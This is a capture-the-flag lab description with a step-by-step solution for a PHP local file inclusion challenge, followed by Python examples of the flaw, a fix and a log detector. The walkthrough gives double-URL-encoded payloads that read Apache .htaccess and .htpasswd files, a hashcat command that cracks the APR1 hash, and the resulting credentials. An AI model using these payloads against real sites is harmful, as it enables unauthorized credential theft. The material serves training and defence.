
Labs / File Include Bypass

  • Daily Challenge
  • Released 17 Sep 2025

🔍 Can you bypass the file inclusion filters?

This corporate document portal implements dynamic file inclusion with security filters to prevent unauthorized access, but experienced attackers know that basic protections often have weaknesses. 🛡️ The system blocks directory traversal and PHP file inclusion, but what about other sensitive files that might be lurking in the web directory? 💡 Master the art of filter bypass and discover how to extract authentication credentials from protected areas! 🔓


🔍 File Include Bypass - Complete Solution

Objective: Exploit the Local File Inclusion vulnerability to bypass security filters, extract Apache authentication files, and crack the admin password to obtain the flag.

🔍 Step 1: Explore the Application

Navigate to the lab instance to access the SecureCorp Document Portal. Notice the URL structure when clicking on different sections:

http:///index.php?page=about
http:///index.php?page=contact
http:///index.php?page=documents

The application uses the page parameter to dynamically include content files based on user input.

🔍 Step 2: Test Security Filters

The application implements security measures to prevent common attacks:

# Directory traversal (blocked)
http:///index.php?page=../etc/passwd
# Result: "Security violation detected!"

# Forward slash (blocked)
http:///index.php?page=admin/test
# Result: "Path traversal not allowed!"

# PHP file inclusion (blocked)
http:///index.php?page=index.php
# Result: "PHP files cannot be included!"

🔍 Step 3: Discover the Admin Directory

The "Admin" link in the navigation points to /admin/. Accessing it directly triggers HTTP Basic Authentication:

http:///admin/
# Result: 401 Unauthorized - requires credentials

This indicates the directory is protected by Apache .htaccess and .htpasswd files.

🔍 Step 4: Bypass Filters with Double URL Encoding

The key vulnerability is that the application performs URL decoding after the security checks. We can bypass the forward slash restriction using double URL encoding:

# Single encoding %2F gets decoded to / before security check (blocked)
# Double encoding %252F gets decoded to %2F, passes security check,
# then gets decoded again to / during file inclusion

# Access .htaccess file
http:///index.php?page=admin%252F.htaccess
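
The check-then-decode ordering described in Step 4, modelled in Python next to an allowlist-based fix. This is an added example, not the lab's PHP source; the function names and the allowlisted file names are assumptions.

```python
from urllib.parse import unquote

# Filter rules and messages as observed in Step 2, in the order they fire.
BLOCK_MESSAGES = (
    ("..", "Security violation detected!"),
    ("/", "Path traversal not allowed!"),
    (".php", "PHP files cannot be included!"),
)

def server_decode(raw_query_value: str) -> str:
    """The single decoding pass the web server applies before the app runs."""
    return unquote(raw_query_value)

def vulnerable_resolve(raw_query_value: str) -> str:
    """Checks run on the once-decoded value, then the app decodes again."""
    page = server_decode(raw_query_value)
    for needle, message in BLOCK_MESSAGES:
        if needle in page:
            return message
    # Flaw: this second decode happens after every check has already passed.
    return "include: " + unquote(page)

# Hypothetical mapping of page names to content files (assumption).
ALLOWED_PAGES = {
    "about": "about.html",
    "contact": "contact.html",
    "documents": "documents.html",
}

def hardened_resolve(raw_query_value: str) -> str:
    """No second decode and no path built from input: fixed allowlist lookup."""
    page = server_decode(raw_query_value)
    target = ALLOWED_PAGES.get(page)
    if target is None:
        return "404"
    return "include: " + target
```

With the allowlist, the value is only ever used as a dictionary key, so no encoding of `/` or `.` can reach the filesystem.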

🔍 Step 5: Extract Authentication Files

Use the double encoding technique to access both Apache authentication files:

# Extract .htaccess configuration
http:///index.php?page=admin%252F.htaccess

# Extract .htpasswd password file
http:///index.php?page=admin%252F.htpasswd

The .htaccess file reveals the authentication configuration:

AuthType Basic
AuthName "SecureCorp Administrative Area"
AuthUserFile /var/www/html/admin/.htpasswd
Require valid-user

The .htpasswd file contains the hashed password:

admin:$apr1$fb5V6tuj$9x0nfH7mvVp9Z.64XmnPW0

🔍 Step 6: Crack the APR1 Hash

The hash format $apr1$ indicates Apache APR1 MD5. Use online tools or command-line utilities to crack it:

# Using online hash crackers like hashkiller.io or crackstation.net
# Or use hashcat/john the ripper:
echo '$apr1$fb5V6tuj$9x0nfH7mvVp9Z.64XmnPW0' > hash.txt
hashcat -m 1600 hash.txt /usr/share/wordlists/rockyou.txt

The APR1 hash cracks to: admin1020304050

🔍 Step 7: Access Admin Panel

Use the cracked credentials to access the protected admin area:

Username: admin
Password: admin1020304050

Navigate to http:///admin/ and enter these credentials when prompted by HTTP Basic Authentication.

🔍 Step 8: Retrieve the Flag

After successful authentication, you'll access the SecureCorp Admin Panel. The flag is displayed in the "System Security Token" section:

Flag: admin1020304050

📚 Key Learning Points
  • Local File Inclusion: Understanding how dynamic file inclusion works and its security implications
  • Double URL Encoding: Bypassing security filters that don't account for multiple encoding layers
  • Apache Authentication: How .htaccess and .htpasswd files work for HTTP Basic Authentication
  • APR1 Hash Cracking: Methods for cracking Apache APR1 MD5 password hashes
  • Security Filter Bypass: Systematic approach to identifying and exploiting input validation flaws

🛡️ Security Implications
  • Input Validation: Implement comprehensive input validation that accounts for multiple encoding layers
  • File Access Controls: Use proper file access controls and avoid dynamic file inclusion when possible
  • Strong Passwords: Use strong, unique passwords and modern hashing algorithms
  • Security Headers: Implement security headers to prevent unauthorized file access
  • Regular Security Testing: Conduct regular security assessments to identify LFI vulnerabilities

Real-World Application: This challenge demonstrates common LFI vulnerabilities found in web applications where developers implement basic security filters without considering encoding bypass techniques. Understanding these methods helps both penetration testers identify vulnerabilities and developers implement more robust protections.
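
On the detection side, requests like those in Steps 4 and 5 stand out in access logs because a parameter still changes when decoded a second time. The following is an added example, not part of the lab; the log lines are constructed and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in Apache access-log style (not taken from the lab).
SAMPLE_LOG = """\
203.0.113.7 - - [17/Sep/2025:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 1523
203.0.113.7 - - [17/Sep/2025:10:01:09 +0000] "GET /index.php?page=admin%2Ftest HTTP/1.1" 200 311
203.0.113.7 - - [17/Sep/2025:10:01:30 +0000] "GET /index.php?page=admin%252F.htpasswd HTTP/1.1" 200 45
198.51.100.4 - - [17/Sep/2025:10:02:00 +0000] "GET /index.php?page=contact&ref=50%25off HTTP/1.1" 200 1490
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Apache auth dotfiles or a parent-directory segment in the decoded value.
SENSITIVE_RE = re.compile(r"(^|/)\.ht\w+$|(^|/)\.\.(/|$)")

def fully_decode(value, max_rounds=5):
    """Decode until the value stops changing; return (value, rounds_needed)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def find_double_encoding(log_text):
    """Report parameters that still change after the server's one decode."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # parse_qsl applies the first decoding pass, as the web server does.
        for name, once_decoded in parse_qsl(query):
            final, extra_rounds = fully_decode(once_decoded)
            if extra_rounds == 0:
                continue  # singly encoded or plain: nothing hidden
            findings.append({
                "client": line.split()[0],
                "param": name,
                "decoded": final,
                "sensitive": bool(SENSITIVE_RE.search(final)),
            })
    return findings
```

A literal percent sign such as `50%25off` is not reported, because its once-decoded form does not change on a second pass.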